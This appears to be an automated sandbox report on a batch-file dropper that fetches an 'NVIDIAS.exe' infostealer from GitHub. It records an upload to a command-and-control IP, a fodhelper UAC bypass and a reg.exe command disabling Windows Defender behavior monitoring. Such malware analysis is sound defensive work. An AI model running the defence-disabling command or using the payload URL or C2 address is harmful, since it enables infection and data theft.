    Source: unknownHTTP traffic detected: POST /upload HTTP/1.1Content-Type: multipart/form-data; boundary="8329d0ed-a884-470e-bcd9-c4075adde960"Host: 89.23.100.233:1490Content-Length: 119581Expect: 100-continueConnection: Keep-Alive
    Source: NVIDIAS.exe, 00000015.00000002.1211552513.000000000362F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://89.23.100.233:1490
    Source: NVIDIAS.exe, 00000015.00000002.1211552513.000000000362F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://89.23.100.233:1490/uploadt
    Source: NVIDIAS.exe, 00000015.00000002.1225165858.0000000070701000.00000020.00000001.01000000.00000008.sdmpString found in binary or memory: http://beta.visualstudio.net/net/sdk/feedback.asp
    Source: svchost.exe, 0000001F.00000002.2121093830.0000020FFFE94000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
    Source: svchost.exe, 0000001F.00000002.2121093830.0000020FFFE94000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
    Source: svchost.exe, 0000001F.00000002.2120814233.0000020FFFE43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
    Source: edb.log.31.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/update2/actxsdodvxbjblyjfcbcbc7srcwa_1.3.36.242/GoogleUpda
    Source: NVIDIAS.exe, 00000015.00000002.1211552513.0000000003598000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://icanhazip.com
    Source: NVIDIAS.exe, 00000015.00000002.1211552513.0000000003598000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://icanhazip.com/
    Source: qmgr.db.31.drString found in binary or memory: http://r4---sn-5hnekn7k.gvt1.com/edgedl/release2/chrome/acb3kitere6jimdp6rrtasanb2aq_93.0.4577.82/93
    Source: qmgr.db.31.drString found in binary or memory: http://redirector.gvt1.com/edgedl/release2/chrome/acb3kitere6jimdp6rrtasanb2aq_93.0.4577.82/93.0.457
    Source: qmgr.db.31.drString found in binary or memory: http://redirector.gvt1.com/edgedl/release2/chrome_component/aciwgjnovhktokhzyboslawih45a_2700/jflook
    Source: qmgr.db.31.drString found in binary or memory: http://redirector.gvt1.com/edgedl/release2/chrome_component/acze3h5f67uhtnjsyv6pabzn277q_298/lmelgle
    Source: qmgr.db.31.drString found in binary or memory: http://redirector.gvt1.com/edgedl/release2/chrome_component/dp66roauucji6olf7ycwe24lea_6869/hfnkpiml
    Source: NVIDIAS.exe, 00000015.00000002.1211552513.0000000003598000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
    Source: qmgr.db.31.drString found in binary or memory: http://storage.googleapis.com/update-delta/ggkkehgbnfjpeggfpleeakpidbkibbmn/2021.9.13.1142/2021.9.7.
    Source: qmgr.db.31.drString found in binary or memory: http://storage.googleapis.com/update-delta/jamhcnnkihinmdlkakkaopbjbbcngflc/96.0.4648.2/96.0.4642.0/
    Source: qmgr.db.31.drString found in binary or memory: http://storage.googleapis.com/update-delta/khaoiebndkojlmppeemjhbpbandiljpe/45/43/19f2dc8e4c5c5d0383
    Source: Amcache.hve.39.drString found in binary or memory: http://upx.sf.net
    Source: svchost.exe, 0000001F.00000002.2121093830.0000020FFFE94000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadis.bm0
    Source: tmp44F6.tmp.dat.21.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
    Source: tmp44F6.tmp.dat.21.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
    Source: tmp44F6.tmp.dat.21.drString found in binary or memory: https://duckduckgo.com/ac/?q=
    Source: NVIDIAS.exe, 00000015.00000002.1214141492.000000000477C000.00000004.00000800.00020000.00000000.sdmp, NVIDIAS.exe, 00000015.00000002.1214141492.0000000004742000.00000004.00000800.00020000.00000000.sdmp, NVIDIAS.exe, 00000015.00000002.1214141492.000000000479D000.00000004.00000800.00020000.00000000.sdmp, NVIDIAS.exe, 00000015.00000002.1214141492.00000000047BE000.00000004.00000800.00020000.00000000.sdmp, tmp44D3.tmp.dat.21.dr, tmp44D2.tmp.dat.21.dr, tmp44F4.tmp.dat.21.dr, tmp44D4.tmp.dat.21.dr, tmp44F7.tmp.dat.21.dr, tmp44F6.tmp.dat.21.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
    Source: tmp44F6.tmp.dat.21.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
    Source: edb.log.31.drString found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
    Source: tmp44F6.tmp.dat.21.drString found in binary or memory: https://gemini.google.com/app?q=
    Source: 3gJQoqWpxb.batString found in binary or memory: https://github.com/pr0niums/Repo/raw/refs/heads/main/NVIDIAS.exe
    Source: tmp44F5.tmp.dat.21.drString found in binary or memory: https://login.live.com/
    Source: NVIDIAS.exe, 00000015.00000002.1211552513.000000000362F000.00000004.00000800.00020000.00000000.sdmp, tmp44F5.tmp.dat.21.drString found in binary or memory: https://login.live.com//
    Source: NVIDIAS.exe, 00000015.00000002.1211552513.000000000362F000.00000004.00000800.00020000.00000000.sdmp, tmp44F5.tmp.dat.21.drString found in binary or memory: https://login.live.com/https://login.live.com/
    Source: NVIDIAS.exe, 00000015.00000002.1211552513.000000000362F000.00000004.00000800.00020000.00000000.sdmp, tmp44F5.tmp.dat.21.drString found in binary or memory: https://login.live.com/v104
    Source: qmgr.db.31.drString found in binary or memory: https://msftspeechmodelsprod.azureedge.net/SR/SV10-EV100/en-us-n/MV101/naspmodelsmetadata.xmlPC:
    Source: svchost.exe, 0000001F.00000002.2121093830.0000020FFFE94000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
    Source: NVIDIAS.exe, 00000015.00000002.1214141492.000000000477C000.00000004.00000800.00020000.00000000.sdmp, NVIDIAS.exe, 00000015.00000002.1214141492.0000000004742000.00000004.00000800.00020000.00000000.sdmp, NVIDIAS.exe, 00000015.00000002.1214141492.000000000479D000.00000004.00000800.00020000.00000000.sdmp, NVIDIAS.exe, 00000015.00000002.1214141492.00000000047BE000.00000004.00000800.00020000.00000000.sdmp, tmp44D3.tmp.dat.21.dr, tmp44D2.tmp.dat.21.dr, tmp44F4.tmp.dat.21.dr, tmp44D4.tmp.dat.21.dr, tmp44F7.tmp.dat.21.dr, tmp44F6.tmp.dat.21.drString found in binary or memory: https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/search
    Source: NVIDIAS.exe, 00000015.00000002.1214141492.000000000477C000.00000004.00000800.00020000.00000000.sdmp, NVIDIAS.exe, 00000015.00000002.1214141492.0000000004742000.00000004.00000800.00020000.00000000.sdmp, NVIDIAS.exe, 00000015.00000002.1214141492.000000000479D000.00000004.00000800.00020000.00000000.sdmp, NVIDIAS.exe, 00000015.00000002.1214141492.00000000047BE000.00000004.00000800.00020000.00000000.sdmp, tmp44D3.tmp.dat.21.dr, tmp44D2.tmp.dat.21.dr, tmp44F4.tmp.dat.21.dr, tmp44D4.tmp.dat.21.dr, tmp44F7.tmp.dat.21.dr, tmp44F6.tmp.dat.21.drString found in binary or memory: https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
    Source: NVIDIAS.exe, 00000015.00000002.1214141492.000000000477C000.00000004.00000800.00020000.00000000.sdmp, NVIDIAS.exe, 00000015.00000002.1214141492.000000000479D000.00000004.00000800.00020000.00000000.sdmp, NVIDIAS.exe, 00000015.00000002.1214141492.00000000047BE000.00000004.00000800.00020000.00000000.sdmp, tmp44F4.tmp.dat.21.dr, tmp44F7.tmp.dat.21.dr, tmp44F6.tmp.dat.21.drString found in binary or memory: https://www.ecosia.org/newtab/
    Source: NVIDIAS.exe, 00000015.00000002.1214141492.0000000004742000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
    Source: NVIDIAS.exe, 00000015.00000002.1214141492.000000000477C000.00000004.00000800.00020000.00000000.sdmp, NVIDIAS.exe, 00000015.00000002.1214141492.000000000479D000.00000004.00000800.00020000.00000000.sdmp, NVIDIAS.exe, 00000015.00000002.1214141492.00000000047BE000.00000004.00000800.00020000.00000000.sdmp, tmp44F4.tmp.dat.21.dr, tmp44F7.tmp.dat.21.dr, tmp44F6.tmp.dat.21.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
    Source: NVIDIAS.exe, 00000015.00000002.1214141492.0000000004742000.00000004.00000800.00020000.00000000.sdmp, tmp44D3.tmp.dat.21.dr, tmp44D2.tmp.dat.21.dr, tmp44D4.tmp.dat.21.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
    Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
    Source: unknownHTTPS traffic detected: 140.82.113.4:443 -> 192.168.11.20:49707 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.11.20:49708 version: TLS 1.2
    Source: C:\ProgramData\QQQ\NVIDIAS.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

    System Summary

    barindex
    Source: 3gJQoqWpxb.bat, type: SAMPLEMatched rule: detects Windows exceutables potentially bypassing UAC using fodhelper.exe Author: ditekSHen
    Source: NVIDIAS.exe.20.drStatic PE information: section name: .+,2
    Source: NVIDIAS.exe.20.drStatic PE information: section name: .>h"
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\ProgramData\QQQ\NVIDIAS.exeJump to dropped file
    Source: C:\ProgramData\QQQ\NVIDIAS.exeCode function: 21_2_03534300 NtOpenFile,21_2_03534300
    Source: C:\ProgramData\QQQ\NVIDIAS.exeCode function: 21_2_035343D8 NtCreateSection,21_2_035343D8
    Source: C:\ProgramData\QQQ\NVIDIAS.exeCode function: 21_2_03533A28 NtClose,21_2_03533A28
    Source: C:\ProgramData\QQQ\NVIDIAS.exeCode function: 21_2_03534738 NtDeviceIoControlFile,21_2_03534738
    Source: C:\ProgramData\QQQ\NVIDIAS.exeCode function: 21_2_03533FB8 NtAllocateVirtualMemory,21_2_03533FB8
    Source: C:\ProgramData\QQQ\NVIDIAS.exeCode function: 21_2_03534670 NtQueryVolumeInformationFile,21_2_03534670
    Source: C:\ProgramData\QQQ\NVIDIAS.exeCode function: 21_2_03533EE0 NtProtectVirtualMemory,21_2_03533EE0
    Source: C:\ProgramData\QQQ\NVIDIAS.exeCode function: 21_2_03534580 NtMapViewOfSection,21_2_03534580
    Source: C:\ProgramData\QQQ\NVIDIAS.exeCode function: 21_2_035343D0 NtCreateSection,21_2_035343D0
    Source: C:\ProgramData\QQQ\NVIDIAS.exeCode function: 21_2_03533A21 NtClose,21_2_03533A21
    Source: C:\ProgramData\QQQ\NVIDIAS.exeCode function: 21_2_035342F9 NtOpenFile,21_2_035342F9
    Source: C:\ProgramData\QQQ\NVIDIAS.exeCode function: 21_2_03534731 NtDeviceIoControlFile,21_2_03534731
    Source: C:\ProgramData\QQQ\NVIDIAS.exeCode function: 21_2_03533FB0 NtAllocateVirtualMemory,21_2_03533FB0
    Source: C:\ProgramData\QQQ\NVIDIAS.exeCode function: 21_2_03534669 NtQueryVolumeInformationFile,21_2_03534669
    Source: C:\ProgramData\QQQ\NVIDIAS.exeCode function: 21_2_03533EBF NtProtectVirtualMemory,21_2_03533EBF
    Source: C:\ProgramData\QQQ\NVIDIAS.exeCode function: 21_2_03534578 NtMapViewOfSection,21_2_03534578
    Source: C:\ProgramData\QQQ\NVIDIAS.exeCode function: 21_2_03534738: NtDeviceIoControlFile,21_2_03534738
    Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
    Source: C:\ProgramData\QQQ\NVIDIAS.exeCode function: 21_2_033AB25821_2_033AB258
    Source: C:\ProgramData\QQQ\NVIDIAS.exeCode function: 21_2_033AD80021_2_033AD800
    Source: C:\ProgramData\QQQ\NVIDIAS.exeCode function: 21_2_033A109821_2_033A1098
    Source: C:\ProgramData\QQQ\NVIDIAS.exeCode function: 21_2_033A96D021_2_033A96D0
    Source: C:\ProgramData\QQQ\NVIDIAS.exeCode function: 21_2_033ABED021_2_033ABED0
    Source: C:\ProgramData\QQQ\NVIDIAS.exeCode function: 21_2_033A8D0821_2_033A8D08
    Source: C:\ProgramData\QQQ\NVIDIAS.exeCode function: 21_2_033A936821_2_033A9368
    Source: C:\ProgramData\QQQ\NVIDIAS.exeCode function: 21_2_033A935821_2_033A9358
    Source: C:\ProgramData\QQQ\NVIDIAS.exeCode function: 21_2_033A0A7021_2_033A0A70
    Source: C:\ProgramData\QQQ\NVIDIAS.exeCode function: 21_2_033AB98021_2_033AB980
    Source: C:\ProgramData\QQQ\NVIDIAS.exeCode function: 21_2_033A108921_2_033A1089
    Source: C:\ProgramData\QQQ\NVIDIAS.exeCode function: 21_2_033A9F8821_2_033A9F88
    Source: C:\ProgramData\QQQ\NVIDIAS.exeCode function: 21_2_033A9E3821_2_033A9E38
    Source: C:\ProgramData\QQQ\NVIDIAS.exeCode function: 21_2_033A9E2821_2_033A9E28
    Source: C:\ProgramData\QQQ\NVIDIAS.exeCode function: 21_2_033A962121_2_033A9621
    Source: C:\ProgramData\QQQ\NVIDIAS.exeCode function: 21_2_033A8CFA21_2_033A8CFA
    Source: C:\ProgramData\QQQ\NVIDIAS.exeCode function: 21_2_03531B1021_2_03531B10
    Source: C:\ProgramData\QQQ\NVIDIAS.exeCode function: 21_2_0353C97821_2_0353C978
    Source: C:\ProgramData\QQQ\NVIDIAS.exeCode function: 21_2_0353318021_2_03533180
    Source: C:\ProgramData\QQQ\NVIDIAS.exeCode function: 21_2_0353E06121_2_0353E061
    Source: C:\ProgramData\QQQ\NVIDIAS.exeCode function: 21_2_0353877821_2_03538778
    Source: C:\ProgramData\QQQ\NVIDIAS.exeCode function: 21_2_03534FC021_2_03534FC0
    Source: C:\ProgramData\QQQ\NVIDIAS.exeCode function: 21_2_0353064821_2_03530648
    Source: C:\ProgramData\QQQ\NVIDIAS.exeCode function: 21_2_03532DF121_2_03532DF1
    Source: C:\ProgramData\QQQ\NVIDIAS.exeCode function: 21_2_03535C9021_2_03535C90
    Source: C:\ProgramData\QQQ\NVIDIAS.exeCode function: 21_2_0353F4AB21_2_0353F4AB
    Source: C:\ProgramData\QQQ\NVIDIAS.exeCode function: 21_2_03538A2021_2_03538A20
    Source: C:\ProgramData\QQQ\NVIDIAS.exeCode function: 21_2_035332E021_2_035332E0
    Source: C:\ProgramData\QQQ\NVIDIAS.exeCode function: 21_2_0353C95D21_2_0353C95D
    Source: C:\ProgramData\QQQ\NVIDIAS.exeCode function: 21_2_0353317121_2_03533171
    Source: C:\ProgramData\QQQ\NVIDIAS.exeCode function: 21_2_0353507021_2_03535070
    Source: C:\ProgramData\QQQ\NVIDIAS.exeCode function: 21_2_0353481021_2_03534810
    Source: C:\ProgramData\QQQ\NVIDIAS.exeCode function: 21_2_0353F4AB21_2_0353F4AB
    Source: C:\ProgramData\QQQ\NVIDIAS.exeCode function: 21_2_035317B021_2_035317B0
    Source: C:\ProgramData\QQQ\NVIDIAS.exeCode function: 21_2_0353063821_2_03530638
    Source: C:\ProgramData\QQQ\NVIDIAS.exeCode function: 21_2_03537C7021_2_03537C70
    Source: C:\ProgramData\QQQ\NVIDIAS.exeCode function: 21_2_03537C6021_2_03537C60
    Source: C:\ProgramData\QQQ\NVIDIAS.exeCode function: 21_2_03536C9021_2_03536C90
    Source: C:\ProgramData\QQQ\NVIDIAS.exeCode function: 21_2_05D431C021_2_05D431C0
    Source: C:\ProgramData\QQQ\NVIDIAS.exeCode function: 21_2_05D4614021_2_05D46140
    Source: C:\ProgramData\QQQ\NVIDIAS.exeCode function: 21_2_05D4A4D021_2_05D4A4D0
    Source: C:\ProgramData\QQQ\NVIDIAS.exeCode function: 21_2_05D4A0D021_2_05D4A0D0
    Source: C:\ProgramData\QQQ\NVIDIAS.exeCode function: 21_2_05D42C8021_2_05D42C80
    Source: C:\ProgramData\QQQ\NVIDIAS.exeCode function: 21_2_05D4206821_2_05D42068
    Source: C:\ProgramData\QQQ\NVIDIAS.exeCode function: 21_2_05D4F03021_2_05D4F030
    Source: C:\ProgramData\QQQ\NVIDIAS.exeCode function: 21_2_05D4AC2021_2_05D4AC20
    Source: C:\ProgramData\QQQ\NVIDIAS.exeCode function: 21_2_05D437E021_2_05D437E0
    Source: C:\ProgramData\QQQ\NVIDIAS.exeCode function: 21_2_05D497E821_2_05D497E8
    Source: C:\ProgramData\QQQ\NVIDIAS.exeCode function: 21_2_05D423B021_2_05D423B0
    Source: C:\ProgramData\QQQ\NVIDIAS.exeCode function: 21_2_05D44B3821_2_05D44B38
    Source: C:\ProgramData\QQQ\NVIDIAS.exeCode function: 21_2_05D455C821_2_05D455C8
    Source: C:\ProgramData\QQQ\NVIDIAS.exeCode function: 21_2_05D439B021_2_05D439B0
    Source: C:\ProgramData\QQQ\NVIDIAS.exeCode function: 21_2_05D489B821_2_05D489B8
    Source: C:\ProgramData\QQQ\NVIDIAS.exeCode function: 21_2_05D437D121_2_05D437D1
    Source: C:\ProgramData\QQQ\NVIDIAS.exeCode function: 21_2_05D497D821_2_05D497D8
    Source: C:\ProgramData\QQQ\NVIDIAS.exeCode function: 21_2_05D4A70021_2_05D4A700
    Source: C:\ProgramData\QQQ\NVIDIAS.exeCode function: 21_2_05D4614021_2_05D46140
    Source: C:\ProgramData\QQQ\NVIDIAS.exeCode function: 21_2_05D43A1721_2_05D43A17
    Source: C:\ProgramData\QQQ\NVIDIAS.exeCode function: 21_2_05D43A3021_2_05D43A30
    Source: C:\ProgramData\QQQ\NVIDIAS.exeCode function: 21_2_0731F73021_2_0731F730
    Source: C:\ProgramData\QQQ\NVIDIAS.exeCode function: 21_2_0731574021_2_07315740
    Source: C:\ProgramData\QQQ\NVIDIAS.exeCode function: 21_2_0731A7B221_2_0731A7B2
    Source: C:\ProgramData\QQQ\NVIDIAS.exeCode function: 21_2_07312BA321_2_07312BA3
    Source: C:\ProgramData\QQQ\NVIDIAS.exeCode function: 21_2_0731278821_2_07312788
    Source: C:\ProgramData\QQQ\NVIDIAS.exeCode function: 21_2_0731DBC121_2_0731DBC1
    Source: C:\ProgramData\QQQ\NVIDIAS.exeCode function: 21_2_0731923821_2_07319238
    Source: C:\ProgramData\QQQ\NVIDIAS.exeCode function: 21_2_0731227821_2_07312278
    Source: C:\ProgramData\QQQ\NVIDIAS.exeCode function: 21_2_0731366821_2_07313668
    Source: C:\ProgramData\QQQ\NVIDIAS.exeCode function: 21_2_073146B021_2_073146B0
    Source: C:\ProgramData\QQQ\NVIDIAS.exeCode function: 21_2_07314E9821_2_07314E98
    Source: C:\ProgramData\QQQ\NVIDIAS.exeCode function: 21_2_0731C68921_2_0731C689
    Source: C:\ProgramData\QQQ\NVIDIAS.exeCode function: 21_2_0731C2EE21_2_0731C2EE
    Source: C:\ProgramData\QQQ\NVIDIAS.exeCode function: 21_2_0731F6C021_2_0731F6C0
    Source: C:\ProgramData\QQQ\NVIDIAS.exeCode function: 21_2_0731E17821_2_0731E178
    Source: C:\ProgramData\QQQ\NVIDIAS.exeCode function: 21_2_0731D86821_2_0731D868
    Source: C:\ProgramData\QQQ\NVIDIAS.exeCode function: 21_2_0731004021_2_07310040
    Source: C:\ProgramData\QQQ\NVIDIAS.exeCode function: 21_2_0731F0A021_2_0731F0A0
    Source: C:\ProgramData\QQQ\NVIDIAS.exeCode function: 21_2_073124A821_2_073124A8
    Source: C:\ProgramData\QQQ\NVIDIAS.exeCode function: 21_2_07310B6721_2_07310B67
    Source: C:\ProgramData\QQQ\NVIDIAS.exeCode function: 21_2_0731F76821_2_0731F768
    Source: C:\ProgramData\QQQ\NVIDIAS.exeCode function: 21_2_0731434021_2_07314340
    Source: C:\ProgramData\QQQ\NVIDIAS.exeCode function: 21_2_07313E6121_2_07313E61
    Source: C:\ProgramData\QQQ\NVIDIAS.exeCode function: 21_2_0731929821_2_07319298
    Source: C:\ProgramData\QQQ\NVIDIAS.exeCode function: 21_2_0731D85121_2_0731D851
    Source: C:\ProgramData\QQQ\NVIDIAS.exeCode function: 21_2_0731F05F21_2_0731F05F
    Source: C:\ProgramData\QQQ\NVIDIAS.exeCode function: 21_2_0764146821_2_07641468
    Source: C:\ProgramData\QQQ\NVIDIAS.exeCode function: 21_2_07641D7021_2_07641D70
    Source: C:\ProgramData\QQQ\NVIDIAS.exeCode function: 21_2_07643F7021_2_07643F70
    Source: C:\ProgramData\QQQ\NVIDIAS.exeCode function: 21_2_07648A7821_2_07648A78
    Source: C:\ProgramData\QQQ\NVIDIAS.exeCode function: 21_2_0764004021_2_07640040
    Source: C:\ProgramData\QQQ\NVIDIAS.exeCode function: 21_2_07642F4821_2_07642F48
    Source: C:\ProgramData\QQQ\NVIDIAS.exeCode function: 21_2_0764F92121_2_0764F921
    Source: C:\ProgramData\QQQ\NVIDIAS.exeCode function: 21_2_0764350021_2_07643500
    Source: C:\ProgramData\QQQ\NVIDIAS.exeCode function: 21_2_0764750821_2_07647508
    Source: C:\ProgramData\QQQ\NVIDIAS.exeCode function: 21_2_07643A1921_2_07643A19
    Source: C:\ProgramData\QQQ\NVIDIAS.exeCode function: 21_2_076427C921_2_076427C9
    Source: C:\ProgramData\QQQ\NVIDIAS.exeCode function: 21_2_076459A821_2_076459A8
    Source: C:\ProgramData\QQQ\NVIDIAS.exeCode function: 21_2_0764516121_2_07645161
    Source: C:\ProgramData\QQQ\NVIDIAS.exeCode function: 21_2_0764145121_2_07641451
    Source: C:\ProgramData\QQQ\NVIDIAS.exeCode function: 21_2_0764072021_2_07640720
    Source: C:\ProgramData\QQQ\NVIDIAS.exeCode function: 21_2_0764000621_2_07640006
    Source: C:\ProgramData\QQQ\NVIDIAS.exeCode function: 21_2_0764FB1821_2_0764FB18
    Source: C:\ProgramData\QQQ\NVIDIAS.exeCode function: 21_2_0764A7F821_2_0764A7F8
    Source: C:\ProgramData\QQQ\NVIDIAS.exeCode function: 21_2_0764A7AA21_2_0764A7AA
    Source: C:\ProgramData\QQQ\NVIDIAS.exeCode function: 21_2_0830702021_2_08307020
    Source: C:\ProgramData\QQQ\NVIDIAS.exeCode function: 21_2_08307C5821_2_08307C58
    Source: C:\ProgramData\QQQ\NVIDIAS.exeCode function: 21_2_0830004021_2_08300040
    Source: C:\ProgramData\QQQ\NVIDIAS.exeCode function: 21_2_083064B921_2_083064B9
    Source: C:\ProgramData\QQQ\NVIDIAS.exeCode function: 21_2_0830689821_2_08306898
    Source: C:\ProgramData\QQQ\NVIDIAS.exeCode function: 21_2_0830357821_2_08303578
    Source: C:\ProgramData\QQQ\NVIDIAS.exeCode function: 21_2_083065BA21_2_083065BA
    Source: C:\ProgramData\QQQ\NVIDIAS.exeCode function: 21_2_08306DA021_2_08306DA0
    Source: C:\ProgramData\QQQ\NVIDIAS.exeCode function: 21_2_083051D821_2_083051D8
    Source: C:\ProgramData\QQQ\NVIDIAS.exeCode function: 21_2_0830BE3821_2_0830BE38
    Source: C:\ProgramData\QQQ\NVIDIAS.exeCode function: 21_2_0830DE4121_2_0830DE41
    Source: C:\ProgramData\QQQ\NVIDIAS.exeCode function: 21_2_083066FE21_2_083066FE
    Source: C:\ProgramData\QQQ\NVIDIAS.exeCode function: 21_2_0830CF3821_2_0830CF38
    Source: C:\ProgramData\QQQ\NVIDIAS.exeCode function: 21_2_0830DB6921_2_0830DB69
    Source: C:\ProgramData\QQQ\NVIDIAS.exeCode function: 21_2_08308B5821_2_08308B58
    Source: C:\ProgramData\QQQ\NVIDIAS.exeCode function: 21_2_083027C021_2_083027C0
    Source: C:\ProgramData\QQQ\NVIDIAS.exeCode function: 21_2_0830B89021_2_0830B890
    Source: C:\ProgramData\QQQ\NVIDIAS.exeCode function: 21_2_0830B88021_2_0830B880
    Source: C:\ProgramData\QQQ\NVIDIAS.exeCode function: 21_2_0830208A21_2_0830208A
    Source: C:\ProgramData\QQQ\NVIDIAS.exeCode function: 21_2_0830A4D221_2_0830A4D2
    Source: C:\ProgramData\QQQ\NVIDIAS.exeCode function: 21_2_08306D9A21_2_08306D9A
    Source: C:\ProgramData\QQQ\NVIDIAS.exeCode function: 21_2_0830C5F821_2_0830C5F8
    Source: C:\ProgramData\QQQ\NVIDIAS.exeCode function: 21_2_0830C5DD21_2_0830C5DD
    Source: C:\ProgramData\QQQ\NVIDIAS.exeCode function: 21_2_083079C021_2_083079C0
    Source: C:\ProgramData\QQQ\NVIDIAS.exeCode function: 21_2_08305A2F21_2_08305A2F
    Source: C:\ProgramData\QQQ\NVIDIAS.exeCode function: 21_2_08305E1321_2_08305E13
    Source: C:\ProgramData\QQQ\NVIDIAS.exeCode function: 21_2_0830561D21_2_0830561D
    Source: C:\ProgramData\QQQ\NVIDIAS.exeCode function: 21_2_08308E7A21_2_08308E7A
    Source: C:\ProgramData\QQQ\NVIDIAS.exeCode function: 21_2_0830775D21_2_0830775D
    Source: C:\ProgramData\QQQ\NVIDIAS.exeCode function: 21_2_083027B021_2_083027B0
    Source: C:\ProgramData\QQQ\NVIDIAS.exeCode function: 21_2_0830379021_2_08303790
    Source: C:\ProgramData\QQQ\NVIDIAS.exeCode function: 21_2_08307B9821_2_08307B98
    Source: C:\ProgramData\QQQ\NVIDIAS.exeCode function: 21_2_083093AA21_2_083093AA
    Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 716 -ip 716
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /f /v "DisableBehaviorMonitoring" /t REG_DWORD /d 1
    Source: 3gJQoqWpxb.bat, type: SAMPLEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_fodhelper author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using fodhelper.exe
    Source: classification engineClassification label: mal100.troj.spyw.evad.winBAT@66/35@4/5
    Source: C:\ProgramData\QQQ\NVIDIAS.exeCode function: 21_2_07640040 CreateToolhelp32Snapshot,21_2_07640040
    Source: C:\ProgramData\QQQ\NVIDIAS.exeMutant created: NULL
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:724:304:WilStaging_02
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7828:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8816:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7784:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8816:304:WilStaging_02
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7784:304:WilStaging_02
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:724:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7828:304:WilStaging_02
    Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess716
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_t5esurz3.4we.ps1Jump to behavior
    Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\3gJQoqWpxb.bat" "
    Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;SecurityHealthSystray.exe&quot;)
    Source: C:\ProgramData\QQQ\NVIDIAS.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
    Source: C:\ProgramData\QQQ\NVIDIAS.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, NumberOfCores, MaxClockSpeed FROM Win32_Processor
    Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
    Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( ProcessId = 716)
    Source: C:\ProgramData\QQQ\NVIDIAS.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
    Source: C:\Windows\System32\cacls.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
